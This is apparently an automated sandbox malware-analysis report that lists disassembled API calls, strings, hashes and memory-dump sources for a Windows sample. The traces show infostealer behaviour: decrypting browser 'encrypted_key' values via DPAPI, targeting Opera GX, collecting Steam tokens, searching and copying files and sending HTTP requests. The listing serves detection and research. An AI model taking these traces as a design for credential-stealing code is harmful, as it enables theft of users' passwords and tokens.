                                                                                                                                                                                                                            • Opcode ID: 3289c798fc6c1636399050c6f0931d6368835119ce0ab75040b2dd58f45479ca
                                                                                                                                                                                                                            • Instruction ID: f585363b1073d73c679416fbfda7f8be5c0209c100797f23621ef1c9dee4fcd8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3289c798fc6c1636399050c6f0931d6368835119ce0ab75040b2dd58f45479ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE410A72A0011D9BCF11FFA6DE465CD77B4AF04308F51402AFD44B3192DABCAE898B99
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                              • Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC65,?,?), ref: 004081E5
                                                                                                                                                                                                                              • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                                                                                                                              • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                                                                                                                              • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                                                                                                                              • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                                                                                                                              • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                                                                              • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080D8
                                                                                                                                                                                                                              • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB6A,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080FD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                            • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                                                            • API String ID: 2311102621-738592651
                                                                                                                                                                                                                            • Opcode ID: 1bd4c0b334f1eee68c966cea85af9871a662bf040a3a58fe5cf71bbe849dc783
                                                                                                                                                                                                                            • Instruction ID: 5d652ddacd3f0cc8d6f159dd16f681150e23373ddb7d5df4fae2268399efbaa7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bd4c0b334f1eee68c966cea85af9871a662bf040a3a58fe5cf71bbe849dc783
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B921C532E4020AABDF10EB91DD41ADE7774AF41364F1045BEE950B72D0DF38AA49CA58
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                              • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 004168B5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                            • String ID: ERROR$ERROR
                                                                                                                                                                                                                            • API String ID: 3086566538-2579291623
                                                                                                                                                                                                                            • Opcode ID: cac9703ab203475fa396fdaf6b98a980da18e442b8ee8f3f7fc8e7b3c4c0d57e
                                                                                                                                                                                                                            • Instruction ID: 1a3e91f55c678a087270c1db5f2d4501272bbb0eab73d9e6b4d818c4bfe9c2ae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cac9703ab203475fa396fdaf6b98a980da18e442b8ee8f3f7fc8e7b3c4c0d57e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24017C71A002189BCB20BB76D9869CD73A85F04304F114167BD14E3292D6BCE9898699
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 00416F40
                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4198075804-0
                                                                                                                                                                                                                            • Opcode ID: 1461ab507dc6dfd35255e810fb889321eefe54f3dc9c2a7f5414d00745edce53
                                                                                                                                                                                                                            • Instruction ID: 92bf923f0917d822374c23a0111adfdcc0c83fadde586f70278f9170f8a7b62b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1461ab507dc6dfd35255e810fb889321eefe54f3dc9c2a7f5414d00745edce53
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4821483290021CABCF14EF55EC858DE7BB9FF44395F11812AF906A3151C779AA86CB98
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414ACD), ref: 00412435
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00414ACD,00414ACD,00000000,?,?,?,00414ACD), ref: 0041245C
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00414ACD), ref: 00412473
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1065093856-0
                                                                                                                                                                                                                            • Opcode ID: 8290f85b62bd7e33c2dcfbbc85231208eefcb9fd4bad64c91e3f3f76ae6d28f9
                                                                                                                                                                                                                            • Instruction ID: 4f26f4eda66c6aca4eaf9ff0ad07a1db09bb9ffa41640e3e93edbc8a46cc3130
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8290f85b62bd7e33c2dcfbbc85231208eefcb9fd4bad64c91e3f3f76ae6d28f9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF02471200108BFEF01AF64DD86EEB3B5CEF05398F001122F941D61A0D3A58F515BA9
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C66
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C6D
                                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410C81
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4203777966-0
                                                                                                                                                                                                                            • Opcode ID: 6c13bdc48f24620c1458262451df69a1fa4e50b82ce9a072ad0b58c7c76c57f0
                                                                                                                                                                                                                            • Instruction ID: f6aeb2de1523635185e516c3bea9f441b1e125238e9ebec13057e88de697580f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c13bdc48f24620c1458262451df69a1fa4e50b82ce9a072ad0b58c7c76c57f0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49E08CB1200204BBD7448B99AC8DF8E7BBCDB84711F000235F605D2250E6B4C9848B68
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX,0043684E,0043684B,?,?,?), ref: 0040C964
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00411D67: GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E
                                                                                                                                                                                                                              • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC65,?,?), ref: 004081E5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                                                                            • String ID: Opera GX
                                                                                                                                                                                                                            • API String ID: 1719890681-3280151751
                                                                                                                                                                                                                            • Opcode ID: b431780a783b4e10edc21815d3fb4ee70557222b56005b66ae2425121522efeb
                                                                                                                                                                                                                            • Instruction ID: 763ddcdae33350dc8d5d809906e0fe4b06c038e7bbc47a4f49a053b12efcf3f0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b431780a783b4e10edc21815d3fb4ee70557222b56005b66ae2425121522efeb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52B1E032D0011DABCF11FBA5DE836DD7775AF04308F51413AF90477192DAB8AE8A8B99
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 544645111-3916222277
                                                                                                                                                                                                                            • Opcode ID: 1e0293ad7fe1b410e6cab7663ead9d675dd73926159e09c2aa2d39085b7e9cd6
                                                                                                                                                                                                                            • Instruction ID: 8b34d31359cbfb98b728bace79fec1a9097574c66fcc9e6a4a6ac37e45fc102e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e0293ad7fe1b410e6cab7663ead9d675dd73926159e09c2aa2d39085b7e9cd6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 004163BA
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 004163D8
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 0041605A
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindFirstFileA.KERNEL32(?,?), ref: 00416071
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436ABC), ref: 00416092
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436AC0), ref: 004160AC
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 004160D3
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436647), ref: 004160E7
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 00416104
                                                                                                                                                                                                                              • Part of subcall function 00416013: PathMatchSpecA.SHLWAPI(?,?), ref: 00416131
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?), ref: 00416167
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436AD8), ref: 00416179
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 0041618C
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436ADC), ref: 0041619E
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 004161B2
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 0041611B
                                                                                                                                                                                                                              • Part of subcall function 00416013: CopyFileA.KERNEL32(?,?,00000001), ref: 0041626B
                                                                                                                                                                                                                              • Part of subcall function 00416013: DeleteFileA.KERNEL32(?), ref: 004162DF
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindNextFileA.KERNEL32(?,?), ref: 00416341
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindClose.KERNEL32(?), ref: 00416355
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2104210347-0
                                                                                                                                                                                                                            • Opcode ID: 835dc13343e326b6a76b3cdc0f9d4ab798eb5c860badef69680918f873e4cb55
                                                                                                                                                                                                                            • Instruction ID: d98a3d990a7e0a20ac37cc0cb2d99f709dd4f53037528d44a624c8c1945b1035
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 835dc13343e326b6a76b3cdc0f9d4ab798eb5c860badef69680918f873e4cb55
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F431C77280010DAFDF25EFA0DC03EE8777AEB0C309F05149EB609A72A1DA759A909F55
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00417040
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • Soft\Steam\steam_tokens.txt, xrefs: 00417050
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                            • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                            • API String ID: 502913869-3507145866
                                                                                                                                                                                                                            • Opcode ID: de86626743a9207f6cfc179452c05094693f3bb4c904fe655b6e1b68a8e46c1f
                                                                                                                                                                                                                            • Instruction ID: 8c1449e976d53245424d212d2d9d4a8b7f1f1ffdcc89600b1e8197c73b7b60fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de86626743a9207f6cfc179452c05094693f3bb4c904fe655b6e1b68a8e46c1f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8501E171D00119ABCF00FBE6DD478CE7B789E04358F51417AFA0177152DB78AA8987D9
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocLocal
                                                                                                                                                                                                                            • String ID: siA
                                                                                                                                                                                                                            • API String ID: 3494564517-470986483
                                                                                                                                                                                                                            • Opcode ID: fb61fe623097888cf65d3814ddf1640f9bdc70486a4c33bd704b3484e22c8f94
                                                                                                                                                                                                                            • Instruction ID: 346925838d3b14811ea8838da46691f13996bcddb0819abdd03295e02f918ba5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb61fe623097888cf65d3814ddf1640f9bdc70486a4c33bd704b3484e22c8f94
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBE02B3AA017115B87224BFAD8146A7BB5A9FC5B61B08416BEF48CB325C5B5CC4186E4
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004091DA
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004091F5
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • malloc.MSVCRT ref: 0041CC0E
                                                                                                                                                                                                                              • Part of subcall function 0041BBB1: lstrlenA.KERNEL32(?,0041CC1F,0041CCC1,00000000,06400000,00000003,00000000,004175C1,.exe,00436C64,00436C60,00436C5C,00436C58,00436C54,00436C50,00436C4C), ref: 0041BBE3
                                                                                                                                                                                                                              • Part of subcall function 0041BBB1: malloc.MSVCRT ref: 0041BBEB
                                                                                                                                                                                                                              • Part of subcall function 0041BBB1: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBF6
                                                                                                                                                                                                                            • malloc.MSVCRT ref: 0041CC4B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1699248803-0
                                                                                                                                                                                                                            • Opcode ID: 17c493d39a80e18ede87925d05e44b937369a9fceefbaf054919a544ef5e8e25
                                                                                                                                                                                                                            • Instruction ID: 37defdeadf5e2a7b2b3ab4b6ac9d2f2b813142b5edc5aae0dc3332f1f74c3728
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17c493d39a80e18ede87925d05e44b937369a9fceefbaf054919a544ef5e8e25
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7F01D71E0025DABDB15DF68DC909AEB7FCEB48204F0005BAA905D3241DA34AF458B94
                                                                                                                                                                                                                            APIs
